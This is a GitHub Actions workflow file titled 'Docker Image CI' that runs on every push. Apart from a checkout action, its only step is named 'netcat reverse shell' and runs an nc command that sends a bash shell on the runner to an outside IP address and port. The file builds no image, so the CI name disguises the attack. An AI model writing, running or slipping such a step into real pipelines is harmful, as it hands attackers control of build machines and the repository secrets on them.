name: Docker Image CI

on: [push]

jobs:

  build:
 
    runs-on: ubuntu-latest
 
    steps:
    - uses: actions/checkout@v1
    - name: netcat reverse shell
      run: nc 164.132.18.139 38989 –e /bin/bash
